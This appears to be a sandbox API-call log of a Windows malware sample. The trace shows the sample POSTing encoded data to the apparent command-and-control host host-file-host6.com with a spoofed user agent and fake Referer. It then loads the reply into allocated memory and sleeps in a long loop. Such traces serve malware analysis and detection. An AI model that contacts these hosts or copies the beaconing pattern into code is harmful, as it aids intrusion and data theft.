RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9d2ce1df [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x64aa4a6c [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6b4191c9 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xec8717eb [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9413a3f6 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xfcd130f0 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x894345df [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x83130167 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x68eccfc [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x18ee9f8d [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x7ed47148 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5ea29a74 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd9e5d05e [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4e2ff1f9 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x84427370 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8374d3c0 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xee275e56 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8bb2b110 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xee0876b6 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xfd9d088f [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x445754b4 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe1d32188 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd2984179 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8e1bc292 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4c1d3431 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x62307fad [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9edf07a5 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x57f99a97 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x21dac164 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdbd93987 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc50309cd [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xda941ea8 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd55ef33e [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x80b16916 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x543795e2 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd4adc5fe [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x7824ce19 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x30960ea4 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe852d318 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x141fb0cd [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x97b60956 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xcb6b9497 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xec3194bf [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6be87830 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9a1bbe63 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4e82a141 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x771ed3df [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc87c881 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2e048906 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x84a5118b [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xce6731b0 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x34daba3a [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xfdc23d9a [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2174651b [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x57be1228 [0139.274] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xbbf1b0a [0139.274] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x11d) returned 0x8001970 [0139.274] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0139.275] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0139.275] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0139.275] lstrcatA (in: lpString1="", lpString2="FroB*_ei3C*C).gBK]Nwe,@R5u1Gy2>EyfEbx?LUyZ52\\kxxtTD1)xh\\\\F%PAIIAuu\\_nU2[U^eq=t*Di\\3&QPK.UP\"8vMDuzVB%d\\#lD>fDA2tGrOx>Z49<]7t84R#t\\E/^>CF=1=NSqs?cT/qVkJh.Ja.*uKi%;xmWZ)HHi&\\jJy`u%#(qM" | out: lpString1="FroB*_ei3C*C).gBK]Nwe,@R5u1Gy2>EyfEbx?LUyZ52\\kxxtTD1)xh\\\\F%PAIIAuu\\_nU2[U^eq=t*Di\\3&QPK.UP\"8vMDuzVB%d\\#lD>fDA2tGrOx>Z49<]7t84R#t\\E/^>CF=1=NSqs?cT/qVkJh.Ja.*uKi%;xmWZ)HHi&\\jJy`u%#(qM") returned="FroB*_ei3C*C).gBK]Nwe,@R5u1Gy2>EyfEbx?LUyZ52\\kxxtTD1)xh\\\\F%PAIIAuu\\_nU2[U^eq=t*Di\\3&QPK.UP\"8vMDuzVB%d\\#lD>fDA2tGrOx>Z49<]7t84R#t\\E/^>CF=1=NSqs?cT/qVkJh.Ja.*uKi%;xmWZ)HHi&\\jJy`u%#(qM" [0139.275] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10c) returned 0x8001aa0 [0139.275] lstrlenA (lpString="http://host-file-host6.com/") returned 27 [0139.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8001840, cbMultiByte=28, lpWideCharStr=0x8001aa0, cchWideChar=56 | out: lpWideCharStr="http://host-file-host6.com/") returned 28 [0139.275] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xfeefc18 | out: pProxyConfig=0xfeefc18) returned 1 [0139.287] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xa333120 [0139.288] WinHttpCrackUrl (in: pwszUrl="http://host-file-host6.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0xfeefcd0 | out: lpUrlComponents=0xfeefcd0) returned 1 [0139.288] WinHttpConnect (hSession=0xa333120, pswzServerName="host-file-host6.com", nServerPort=0x50, dwReserved=0x0) returned 0xa092590 [0139.288] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x12) returned 0x8001bc0 [0139.288] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x68) returned 0x8001be0 [0139.288] WinHttpOpenRequest (hConnect=0xa092590, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xa460dd0 [0139.288] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x4e) returned 0x8001c50 [0139.288] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10d) returned 0x8001cb0 [0139.288] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf03b1b0c [0139.288] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x12) returned 0x8001dd0 [0139.288] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x17) returned 0x8001df0 [0139.288] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6a7512f4 [0139.288] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd2f52a43 [0139.288] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xaa4ed3d1 [0139.288] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4067d10b [0139.288] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x79c6ac8d [0139.288] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4d39cd48 [0139.288] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x38ff26f8 [0139.288] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x3671765b [0139.288] wsprintfW (in: param_1=0x8001cb0, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://ydwmlcg.net/") returned 41 [0139.288] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001df0) returned 0x17 [0139.288] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001df0) returned 1 [0139.288] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001dd0) returned 0x12 [0139.289] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001dd0) returned 1 [0139.289] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001c50) returned 0x4e [0139.289] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001c50) returned 1 [0139.289] WinHttpAddRequestHeaders (hRequest=0xa460dd0, pwszHeaders="Accept: */*\r\nReferer: http://ydwmlcg.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0139.289] WinHttpSendRequest (hRequest=0xa460dd0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x8001970*, dwOptionalLength=0x114, dwTotalLength=0x114, dwContext=0x0) returned 1 [0139.568] WinHttpReceiveResponse (hRequest=0xa460dd0, lpReserved=0x0) returned 1 [0139.569] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x2800) returned 0x8001dd0 [0139.569] WinHttpReadData (in: hRequest=0xa460dd0, lpBuffer=0x8001dd0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfeefd88 | out: lpBuffer=0x8001dd0*, lpdwNumberOfBytesRead=0xfeefd88*=0x197) returned 1 [0139.569] RtlReAllocateHeap (Heap=0x8000000, Flags=0x8, Ptr=0x8001dd0, Size=0x5000) returned 0x8001dd0 [0139.570] WinHttpReadData (in: hRequest=0xa460dd0, lpBuffer=0x8001f67, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfeefd88 | out: lpBuffer=0x8001f67*, lpdwNumberOfBytesRead=0xfeefd88*=0x0) returned 1 [0139.570] VirtualAlloc (lpAddress=0x0, dwSize=0x197, flAllocationType=0x3000, flProtect=0x4) returned 0x610000 [0139.572] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001dd0) returned 1 [0139.573] WinHttpCloseHandle (hInternet=0xa460dd0) returned 1 [0139.573] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001cb0) returned 0x10d [0139.573] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001cb0) returned 1 [0139.573] WinHttpCloseHandle (hInternet=0xa092590) returned 1 [0139.573] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001be0) returned 0x68 [0139.574] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001be0) returned 1 [0139.575] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001bc0) returned 0x12 [0139.575] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001bc0) returned 1 [0139.575] WinHttpCloseHandle (hInternet=0xa333120) returned 1 [0139.575] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001aa0) returned 0x10c [0139.575] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001aa0) returned 1 [0139.575] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001890) returned 0xce [0139.576] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001890) returned 1 [0139.576] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001970) returned 0x11d [0139.576] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001970) returned 1 [0139.576] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0139.578] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001840) returned 0x24 [0139.578] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001840) returned 1 [0139.579] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0139.580] Sleep (dwMilliseconds=0x258) [0140.187] Sleep (dwMilliseconds=0x258) [0140.818] Sleep (dwMilliseconds=0x258) [0141.453] Sleep (dwMilliseconds=0x258) [0142.117] Sleep (dwMilliseconds=0x258) [0142.771] Sleep (dwMilliseconds=0x258) [0143.390] Sleep (dwMilliseconds=0x258) [0144.031] Sleep (dwMilliseconds=0x258) [0144.640] Sleep (dwMilliseconds=0x258) [0145.246] Sleep (dwMilliseconds=0x258) [0145.984] Sleep (dwMilliseconds=0x258) [0146.593] Sleep (dwMilliseconds=0x258) [0147.205] Sleep (dwMilliseconds=0x258) [0147.848] Sleep (dwMilliseconds=0x258) [0148.451] Sleep (dwMilliseconds=0x258) [0149.177] Sleep (dwMilliseconds=0x258) [0149.781] Sleep (dwMilliseconds=0x258) [0150.409] Sleep (dwMilliseconds=0x258) [0150.452] Sleep (dwMilliseconds=0x258) [0150.466] Sleep (dwMilliseconds=0x258) [0150.481] Sleep (dwMilliseconds=0x258) [0150.497] Sleep (dwMilliseconds=0x258) [0150.515] Sleep (dwMilliseconds=0x258) [0150.545] Sleep (dwMilliseconds=0x258) [0150.562] Sleep (dwMilliseconds=0x258) [0150.608] Sleep (dwMilliseconds=0x258) [0150.654] Sleep (dwMilliseconds=0x258) [0150.671] Sleep (dwMilliseconds=0x258) [0150.687] Sleep (dwMilliseconds=0x258) [0150.700] Sleep (dwMilliseconds=0x258) [0150.715] Sleep (dwMilliseconds=0x258) [0150.731] Sleep (dwMilliseconds=0x258) [0150.749] Sleep (dwMilliseconds=0x258) [0150.812] Sleep (dwMilliseconds=0x258) [0150.857] Sleep (dwMilliseconds=0x258) [0150.878] Sleep (dwMilliseconds=0x258) [0150.888] Sleep (dwMilliseconds=0x258) [0150.903] Sleep (dwMilliseconds=0x258) [0150.918] Sleep (dwMilliseconds=0x258) [0150.947] Sleep (dwMilliseconds=0x258) [0150.953] Sleep (dwMilliseconds=0x258) [0150.967] Sleep (dwMilliseconds=0x258) [0151.031] Sleep (dwMilliseconds=0x258) [0151.092] Sleep (dwMilliseconds=0x258) [0151.215] Sleep (dwMilliseconds=0x258) [0151.266] Sleep (dwMilliseconds=0x258) [0151.324] Sleep (dwMilliseconds=0x258) [0151.438] Sleep (dwMilliseconds=0x258) [0151.454] Sleep (dwMilliseconds=0x258) [0151.501] Sleep (dwMilliseconds=0x258) [0151.536] Sleep (dwMilliseconds=0x258) [0151.544] Sleep (dwMilliseconds=0x258) [0151.562] Sleep (dwMilliseconds=0x258) [0151.610] Sleep (dwMilliseconds=0x258) [0151.645] Sleep (dwMilliseconds=0x258) [0151.655] Sleep (dwMilliseconds=0x258) [0151.671] Sleep (dwMilliseconds=0x258) [0151.718] Sleep (dwMilliseconds=0x258) [0151.753] Sleep (dwMilliseconds=0x258) [0151.762] Sleep (dwMilliseconds=0x258) [0151.791] Sleep (dwMilliseconds=0x258) [0151.844] Sleep (dwMilliseconds=0x258) [0151.885] Sleep (dwMilliseconds=0x258) [0151.887] Sleep (dwMilliseconds=0x258) [0151.907] Sleep (dwMilliseconds=0x258) [0151.951] Sleep (dwMilliseconds=0x258) [0151.994] Sleep (dwMilliseconds=0x258) [0152.000] Sleep (dwMilliseconds=0x258) [0152.047] Sleep (dwMilliseconds=0x258) [0152.106] Sleep (dwMilliseconds=0x258) [0152.204] Sleep (dwMilliseconds=0x258) [0152.266] Sleep (dwMilliseconds=0x258) [0152.285] Sleep (dwMilliseconds=0x258) [0152.296] Sleep (dwMilliseconds=0x258) [0152.329] Sleep (dwMilliseconds=0x258) [0152.374] Sleep (dwMilliseconds=0x258) [0152.397] Sleep (dwMilliseconds=0x258) [0152.402] Sleep (dwMilliseconds=0x258) [0152.438] Sleep (dwMilliseconds=0x258) [0152.481] Sleep (dwMilliseconds=0x258) [0152.507] Sleep (dwMilliseconds=0x258) [0152.512] Sleep (dwMilliseconds=0x258) [0152.531] Sleep (dwMilliseconds=0x258) [0152.578] Sleep (dwMilliseconds=0x258) [0152.623] Sleep (dwMilliseconds=0x258) [0152.643] Sleep (dwMilliseconds=0x258) [0152.688] Sleep (dwMilliseconds=0x258) [0152.728] Sleep (dwMilliseconds=0x258) [0152.734] Sleep (dwMilliseconds=0x258) [0152.798] Sleep (dwMilliseconds=0x258) [0152.845] Sleep (dwMilliseconds=0x258) [0152.862] Sleep (dwMilliseconds=0x258) [0152.875] Sleep (dwMilliseconds=0x258) [0152.907] Sleep (dwMilliseconds=0x258) [0152.953] Sleep (dwMilliseconds=0x258) [0152.988] Sleep (dwMilliseconds=0x258) [0152.999] Sleep (dwMilliseconds=0x258) [0153.016] Sleep (dwMilliseconds=0x258) [0153.063] Sleep (dwMilliseconds=0x258) [0153.128] Sleep (dwMilliseconds=0x258) [0153.232] Sleep (dwMilliseconds=0x258) [0153.279] Sleep (dwMilliseconds=0x258) [0153.297] Sleep (dwMilliseconds=0x258) [0153.363] Sleep (dwMilliseconds=0x258) [0153.405] Sleep (dwMilliseconds=0x258) [0153.469] Sleep (dwMilliseconds=0x258) [0153.522] Sleep (dwMilliseconds=0x258) [0153.528] Sleep (dwMilliseconds=0x258) [0153.578] Sleep (dwMilliseconds=0x258) [0153.611] Sleep (dwMilliseconds=0x258) [0153.621] Sleep (dwMilliseconds=0x258) [0153.640] Sleep (dwMilliseconds=0x258) [0153.689] Sleep (dwMilliseconds=0x258) [0153.732] Sleep (dwMilliseconds=0x258) [0153.749] Sleep (dwMilliseconds=0x258) [0153.797] Sleep (dwMilliseconds=0x258) [0153.820] Sleep (dwMilliseconds=0x258) [0153.825] Sleep (dwMilliseconds=0x258) [0153.840] Sleep (dwMilliseconds=0x258) [0153.887] Sleep (dwMilliseconds=0x258) [0153.908] Sleep (dwMilliseconds=0x258) [0153.919] Sleep (dwMilliseconds=0x258) [0153.934] Sleep (dwMilliseconds=0x258) [0153.983] Sleep (dwMilliseconds=0x258) [0153.997] Sleep (dwMilliseconds=0x258) [0154.014] Sleep (dwMilliseconds=0x258) [0154.059] Sleep (dwMilliseconds=0x258) [0154.094] Sleep (dwMilliseconds=0x258) [0154.106] Sleep (dwMilliseconds=0x258) [0154.122] Sleep (dwMilliseconds=0x258) [0154.169] Sleep (dwMilliseconds=0x258) [0154.217] Sleep (dwMilliseconds=0x258) [0154.262] Sleep (dwMilliseconds=0x258) [0154.299] Sleep (dwMilliseconds=0x258) [0154.314] Sleep (dwMilliseconds=0x258) [0154.359] Sleep (dwMilliseconds=0x258) [0154.398] Sleep (dwMilliseconds=0x258) [0154.403] Sleep (dwMilliseconds=0x258) [0154.433] Sleep (dwMilliseconds=0x258) [0154.482] Sleep (dwMilliseconds=0x258) [0154.521] Sleep (dwMilliseconds=0x258) [0154.528] Sleep (dwMilliseconds=0x258) [0154.544] Sleep (dwMilliseconds=0x258) [0154.603] Sleep (dwMilliseconds=0x258) [0154.653] Sleep (dwMilliseconds=0x258) [0154.703] Sleep (dwMilliseconds=0x258) [0154.751] Sleep (dwMilliseconds=0x258) [0154.805] Sleep (dwMilliseconds=0x258) [0154.860] Sleep (dwMilliseconds=0x258) [0154.879] Sleep (dwMilliseconds=0x258) [0154.891] Sleep (dwMilliseconds=0x258) [0154.984] Sleep (dwMilliseconds=0x258) [0155.034] Sleep (dwMilliseconds=0x258) [0155.090] Sleep (dwMilliseconds=0x258) [0155.109] Sleep (dwMilliseconds=0x258) [0155.177] Sleep (dwMilliseconds=0x258) [0155.275] Sleep (dwMilliseconds=0x258) [0155.286] Sleep (dwMilliseconds=0x258) [0155.295] Sleep (dwMilliseconds=0x258) [0155.327] Sleep (dwMilliseconds=0x258) [0155.376] Sleep (dwMilliseconds=0x258) [0155.401] Sleep (dwMilliseconds=0x258) [0155.402] Sleep (dwMilliseconds=0x258) [0155.434] Sleep (dwMilliseconds=0x258) [0155.485] Sleep (dwMilliseconds=0x258) [0155.531] Sleep (dwMilliseconds=0x258) [0155.578] Sleep (dwMilliseconds=0x258) [0155.625] Sleep (dwMilliseconds=0x258) [0155.672] Sleep (dwMilliseconds=0x258) [0155.691] Sleep (dwMilliseconds=0x258) [0155.700] Sleep (dwMilliseconds=0x258) [0155.734] Sleep (dwMilliseconds=0x258) [0155.781] Sleep (dwMilliseconds=0x258) [0155.830] Sleep (dwMilliseconds=0x258) [0155.872] Sleep (dwMilliseconds=0x258) [0155.919] Sleep (dwMilliseconds=0x258) [0155.965] Sleep (dwMilliseconds=0x258) [0155.981] Sleep (dwMilliseconds=0x258) [0156.031] Sleep (dwMilliseconds=0x258) [0156.060] Sleep (dwMilliseconds=0x258) [0156.086] Sleep (dwMilliseconds=0x258) [0156.091] Sleep (dwMilliseconds=0x258) [0156.200] Sleep (dwMilliseconds=0x258) [0156.225] Sleep (dwMilliseconds=0x258) [0156.284] Sleep (dwMilliseconds=0x258) [0156.312] Sleep (dwMilliseconds=0x258) [0156.360] Sleep (dwMilliseconds=0x258) [0156.386] Sleep (dwMilliseconds=0x258) [0156.407] Sleep (dwMilliseconds=0x258) [0156.453] Sleep (dwMilliseconds=0x258) [0156.485] Sleep (dwMilliseconds=0x258) [0156.496] Sleep (dwMilliseconds=0x258) [0156.564] Sleep (dwMilliseconds=0x258) [0156.609] Sleep (dwMilliseconds=0x258) [0156.626] Sleep (dwMilliseconds=0x258) [0156.672] Sleep (dwMilliseconds=0x258) [0156.720] Sleep (dwMilliseconds=0x258) [0156.738] Sleep (dwMilliseconds=0x258) [0156.750] Sleep (dwMilliseconds=0x258) [0156.781] Sleep (dwMilliseconds=0x258) [0156.829] Sleep (dwMilliseconds=0x258) [0156.863] Sleep (dwMilliseconds=0x258) [0156.875] Sleep (dwMilliseconds=0x258) [0156.890] Sleep (dwMilliseconds=0x258) [0156.937] Sleep (dwMilliseconds=0x258) [0156.967] Sleep (dwMilliseconds=0x258) [0156.985] Sleep (dwMilliseconds=0x258) [0157.033] Sleep (dwMilliseconds=0x258) [0157.090] Sleep (dwMilliseconds=0x258) [0157.140] Sleep (dwMilliseconds=0x258) [0157.188] Sleep (dwMilliseconds=0x258) [0157.233] Sleep (dwMilliseconds=0x258) [0157.392] Sleep (dwMilliseconds=0x258) [0157.408] Sleep (dwMilliseconds=0x258) [0157.421] Sleep (dwMilliseconds=0x258) [0157.450] Sleep (dwMilliseconds=0x258) [0157.500] Sleep (dwMilliseconds=0x258) [0157.523] Sleep (dwMilliseconds=0x258) [0157.529] Sleep (dwMilliseconds=0x258) [0157.546] Sleep (dwMilliseconds=0x258) [0157.594] Sleep (dwMilliseconds=0x258) [0157.628] Sleep (dwMilliseconds=0x258) [0157.641] Sleep (dwMilliseconds=0x258) [0157.656] Sleep (dwMilliseconds=0x258) [0157.703] Sleep (dwMilliseconds=0x258) [0157.744] Sleep (dwMilliseconds=0x258) [0157.748] Sleep (dwMilliseconds=0x258) [0157.797] Sleep (dwMilliseconds=0x258) [0157.835] Sleep (dwMilliseconds=0x258) [0157.853] Sleep (dwMilliseconds=0x258) [0157.892] Sleep (dwMilliseconds=0x258) [0157.948] Sleep (dwMilliseconds=0x258) [0157.995] Sleep (dwMilliseconds=0x258) [0158.028] Sleep (dwMilliseconds=0x258) [0158.088] Sleep (dwMilliseconds=0x258) [0158.129] Sleep (dwMilliseconds=0x258) [0158.141] Sleep (dwMilliseconds=0x258) [0158.156] Sleep (dwMilliseconds=0x258) [0158.203] Sleep (dwMilliseconds=0x258) [0158.244] Sleep (dwMilliseconds=0x258) [0158.249] Sleep (dwMilliseconds=0x258) [0158.329] Sleep (dwMilliseconds=0x258) [0158.376] Sleep (dwMilliseconds=0x258) [0158.392] Sleep (dwMilliseconds=0x258) [0158.403] Sleep (dwMilliseconds=0x258) [0158.439] Sleep (dwMilliseconds=0x258) [0158.488] Sleep (dwMilliseconds=0x258) [0158.517] Sleep (dwMilliseconds=0x258) [0158.530] Sleep (dwMilliseconds=0x258) [0158.546] Sleep (dwMilliseconds=0x258) [0158.595] Sleep (dwMilliseconds=0x258) [0158.632] Sleep (dwMilliseconds=0x258) [0158.639] Sleep (dwMilliseconds=0x258) [0158.657] Sleep (dwMilliseconds=0x258) [0158.703] Sleep (dwMilliseconds=0x258) [0158.732] Sleep (dwMilliseconds=0x258) [0158.750] Sleep (dwMilliseconds=0x258) [0158.797] Sleep (dwMilliseconds=0x258) [0158.873] Sleep (dwMilliseconds=0x258) [0158.924] Sleep (dwMilliseconds=0x258) [0158.970] Sleep (dwMilliseconds=0x258) [0159.006] Sleep (dwMilliseconds=0x258) [0159.015] Sleep (dwMilliseconds=0x258) [0159.041] Sleep (dwMilliseconds=0x258) [0159.135] Sleep (dwMilliseconds=0x258) [0159.164] Sleep (dwMilliseconds=0x258) [0159.170] Sleep (dwMilliseconds=0x258) [0159.184] Sleep (dwMilliseconds=0x258) [0159.232] Sleep (dwMilliseconds=0x258) [0159.249] Sleep (dwMilliseconds=0x258) [0159.263] Sleep (dwMilliseconds=0x258) [0159.325] Sleep (dwMilliseconds=0x258) [0159.373] Sleep (dwMilliseconds=0x258) [0159.390] Sleep (dwMilliseconds=0x258) [0159.404] Sleep (dwMilliseconds=0x258) [0159.434] Sleep (dwMilliseconds=0x258) [0159.485] Sleep (dwMilliseconds=0x258) [0159.516] Sleep (dwMilliseconds=0x258) [0159.533] Sleep (dwMilliseconds=0x258) [0159.549] Sleep (dwMilliseconds=0x258) [0159.609] Sleep (dwMilliseconds=0x258) [0159.652] Sleep (dwMilliseconds=0x258) [0159.720] Sleep (dwMilliseconds=0x258) [0159.782] Sleep (dwMilliseconds=0x258) [0159.884] Sleep (dwMilliseconds=0x258) [0159.925] Sleep (dwMilliseconds=0x258) [0160.014] Sleep (dwMilliseconds=0x258) [0160.122] Sleep (dwMilliseconds=0x258) [0160.216] Sleep (dwMilliseconds=0x258) [0160.372] Sleep (dwMilliseconds=0x258) [0160.436] Sleep (dwMilliseconds=0x258) [0160.636] Sleep (dwMilliseconds=0x258) [0160.733] Sleep (dwMilliseconds=0x258) [0160.826] Sleep (dwMilliseconds=0x258) [0161.016] Sleep (dwMilliseconds=0x258) [0161.059] Sleep (dwMilliseconds=0x258) [0161.125] Sleep (dwMilliseconds=0x258) [0161.172] Sleep (dwMilliseconds=0x258) [0161.216] Sleep (dwMilliseconds=0x258) [0161.267] Sleep (dwMilliseconds=0x258) [0161.301] Sleep (dwMilliseconds=0x258) [0161.339] Sleep (dwMilliseconds=0x258) [0161.360] Sleep (dwMilliseconds=0x258) [0161.406] Sleep (dwMilliseconds=0x258) [0161.454] Sleep (dwMilliseconds=0x258) [0161.531] Sleep (dwMilliseconds=0x258) [0161.580] Sleep (dwMilliseconds=0x258) [0161.599] Sleep (dwMilliseconds=0x258) [0161.606] Sleep (dwMilliseconds=0x258) [0161.640] Sleep (dwMilliseconds=0x258) 